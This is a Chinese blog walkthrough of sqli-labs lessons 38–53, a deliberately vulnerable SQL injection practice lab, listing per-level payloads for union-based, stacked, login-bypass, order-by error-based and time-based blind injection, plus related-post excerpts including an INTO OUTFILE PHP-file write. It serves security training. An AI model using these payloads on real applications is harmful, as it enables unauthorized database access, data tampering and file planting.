sqli-labs 38-53关卡

最新推荐文章于 2023-12-28 16:03:25 发布
最新推荐文章于 2023-12-28 16:03:25 发布
阅读量270 收藏
点赞数
分类专栏: 专项靶场 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/borrrrring/article/details/109005451
版权

less 38

“基于字符型的堆叠注入”
Payload:
1.?id=-1’ union select 1,database(),3 --+
同less 1
2.?id=1;CREATE DATABASE sq default charset utf8; --+ //查询id为1的用户名密码,同时创建名为sq的数据库

知识点:

  1. Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。mysqli_multi_query() 函数执行一个或多个针对数据库的查询。
  2. 在SQL中,分号(;)是用来表示一条sql语句的结束。
  3. 联合注入与堆叠注入的区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。
  4. 堆叠注入具有一定的局限性。
  5. X显示数据库

less 39

“基于数字型的堆叠注入“
Payload:
?id=-1 union select 1,database(),3
同less 38
?id=1;insert into users values(17,“yyyyyyyx”,“yyyyyyyx”) --+ /插入数据/

less 40

“基于’)的盲注堆叠注入“
Payload:
?id=-1’) union select 1,database(),3 --+
同less 38
?id=1;insert into users values(17,“yyyyyyyx”,“yyyyyyyx”) --+

less 41

“基于数字型的盲注堆叠注入”
Payload:
?id=-1 union select 1,database(),3
同less 39
?id=1;insert into users values(17,“yyyyyyyx”,“yyyyyyyx”) --+ /插入数据/

less 42

“基于‘字符型的堆叠注入“
注入语句:
在password处进行注入
admin’ union select 1,database(),3 --+
在这里插入图片描述

同less 38
admin’;insert into users values(17,“yyyyyyyx”,“yyyyyyyx”) --+

less 43

“基于’)字符型的堆叠注入”
注入语句:
在password处进行注入
admin’) union select 1,database(),3 --+
admin’);insert into users values(17,“yyyyyyyx”,“yyyyyyyx”) --+
同 less 42

less 44

“基于’的堆叠注入“
使用各种特殊符号页面都不提示错误信息,无法进行报错注入。
注入语句:
在password处进行注入
1.111’ or 1–+ //万能密码。即闭合方式是单引号
2.111’; nsert into users values(17,“yyyyyyyx”,“yyyyyyyx”)–+
同 less 43

less 45

“基于’)的堆叠注入“
注入语句:
111’) or 1–+
111’); nsert into users values(17,“yyyyyyyx”,“yyyyyyyx”)–+
同less 44

less 46

“order by注入“
Payload:
1.?sort=1 / ?sort=2 / ?sort=3 / ?sort=4 //测试出sql为select * from users order by $id
2.?sort=1 desc //通过desc(降序)或asc(升序)来判断是否存在注入
3.?sort=1 and updatexml(1,concat(0x7e,database()),1) //获得数据库

知识点:

  1. 可以通过asc 和desc查看返回数据是否相同来简单判断是否存在orderby注入。
  2. order by后面可以加字段名,表达式和字段的位置,字段的位置需要是整数型。order by 后面不可以跟union。
  3. 利用报错方式:
    (1) 返回多条记录
    (2) 利用regexp
    (3) 利用updatexml
    (4) 利用extractvalue
  4. 还可以基于时间盲注

less 47

“基于‘字符串的order by注入“
Payload:
?sort=1’ //根据错误信息判断,闭合方式为单引号
?sort=1’ and updatexml(1,concat(0x7e,database()),1) --+ //获得数据库
同less 46

less 48

“数值型盲注”
因为报错关闭,所以我们进行盲注猜测
Payload:
?sort=1 and updatexml(1,concat(0x7e,database()),1) //没有反应即报错关闭
?sort=(if(length(database())>1,1,sleep(5))) //用延迟时间注入,来获得数据库长度
参考less 9

less 49

“基于‘的字符型盲注”
因为报错关闭,所以我们进行盲注猜测
Payload:
?sort=1’ and if(length(database())>1,1,sleep(5)) --+
同less 48

less 50

“数字型order by注入,堆叠注入”
Payload:
?sort=1;insert into users values(252,‘252’,‘252’); //插入数据
在这里插入图片描述

?sort=1 and updatexml(1,concat(0x7e,database()),1)   //获得数据库

同less 46

less 51

“基于‘的字符串order by注入,堆叠注入”
Payload:
?sort=1’ and updatexml(1,concat(0x7e,database()),1) --+
同less 47

less 52

“数字型注入”
报错关闭,不能进行报错注入
同less 48

less 53

“基于‘的字符串注入”
同样报错关闭,不能进行报错注入
同less 49

borrrrring
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入——堆叠注入
Zhujiangcheng的博客
06-08 913
SQL注入简介——堆叠注入(一)SQL注入的概述和分类1.概述2.分类①按照数据提交的方式来分类:②按照执行效果来分类:③按照注入点类型来分类:(二)堆叠注入1.概念2.局限 (一)SQL注入的概述和分类 1.概述   首先说,什么是SQL注入?   程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤、转义、限制,或者处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据,这一构造字符串非法获取数据的过程就被称为SQL注入。 2.分类 (参考来源: link.) ①按照数
SQL注入-堆叠注入
jokerhappy的博客
07-26 513
堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而un
sql注入 - 堆叠注入
wcy19990628的博客
02-10 326
5、堆叠(多语句)注入 http://localhost/sqli-labs-master/Less-38/?id=-1'; select "<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\aaaaaaaaqq.php" ;-- 在php连接mysql注入中用到了musqli_multi_query...
MySQL堆叠注入
qq_39654116的博客
01-05 493
目录堆叠注入简介对照表格语句 堆叠注入 简介 堆叠注入在mysql上不常见,必须要用到[[mysqli_multi_query()]],可以用分号分割来执行多个语句,堆叠注入非常危险,通常sql注入有诸多限制,比如只能查不能增删改,不能更改数据库设置,而堆叠注入相当于获取了数据库密码进行直连,直接操作数据库 对照表格 PHP连接MySQL数据库有三种方式(MySQL、Mysqli、PDO),同时官方对三者也做了列表性比较: Mysqli PDO MySQL 引入的PHP版本 5.0 5.0
sql注入之堆叠注入
weixin_42566218的博客
02-19 8850
一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs-master.zip
05-26
sqli-labs-master中的每个关卡都模拟了不同类型的SQL注入场景,例如:错误回显、时间基注入、盲注、联合查询注入等。通过这些关卡,你可以实践如何发现注入点、收集信息、执行查询并最终获取敏感数据。 3. 检测SQL...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
MYSQL注入天书之stacked injection
weixin_34221332的博客
08-11 642
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
SQL注入之堆叠注入
Jim的博客
08-13 2931
less-50 源码:$sql="select * from users order by $id"; if (mysqli_multi_query($con1,$sql))  //mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句 注入:?sort=1;create table jack like users# less-
堆叠注入
糖小喵
04-22 378
原理 执行多条语句,多语句之间以分号隔开。首先访问id=1'页面显示错误,id=1'%23,页面返回正常结果。可使用布尔注入、时间注入、也可堆叠注入。 ';select if(substr(user(),1,1)='r',sleep(3),1)%23 堆叠注入的局限性在于并不是每一个环境下都可以执行, 可能受到 API 或者数据库引擎不支持的限制, 当然了权限不足也可以解释为什么攻击者无法...
MySQL之堆叠注入
yuan_boss的博客
08-23 1307
可以看到有个表名为users,可以很容易猜测到这是存用户信息的表,所以可以通过sql注入查找这个表的字段名。通过以上操作,可以知道存密码的地方在users表中,而且密码字段名字为password。再次正常访问,即可发现密码已经修改成了654321。注意堆叠注入需要使用分号表示一个sql语句的结束。任务:对38关进行修改密码,删库,恢复环境。38关,堆叠查询,修改密码为654321。通过堆叠注入即可完成修改密码的操作。
堆叠注入(stacked injecti)
最新发布
m0_73248913的博客
12-28 518
表示一条sql语句的结束,在后面再次执行下一条sql语句。(union只能苹姐一条select语句)其实可以发现就是简单的都能用,和做sql是一样的操作。概念:执行多条sql语句一起执行。
堆叠注入--随便注
qq_43613772的博客
04-30 746
Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入可以执行任何人sql语句。但是当API或数据库引擎的不支持,堆叠注入就不能进行...
Mysql注入 -- 堆叠注入
weixin_41489908的博客
05-25 1274
你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。 ---- 网易云热评 一、堆叠注入介绍 1、多条sql语句同时执行 2、union只能执行查询语句,堆叠可以执行增删改查 3、同时执行三条语句 select 1;select 2;select 3; 二、插入注入 1、找到注入点,添加一条数据 http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,passwor..
搭建本地SQL注入靶场:sqli-labs实战教程
"这篇教程将指导你安装sqli-labs,一个用于学习SQL...sqli-labs的使用不仅仅是完成各个关卡,更重要的是通过实践来理解SQL注入的工作原理,掌握防御技巧,并提升安全意识。不断挑战和反思,才能在这个过程中真正受益。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值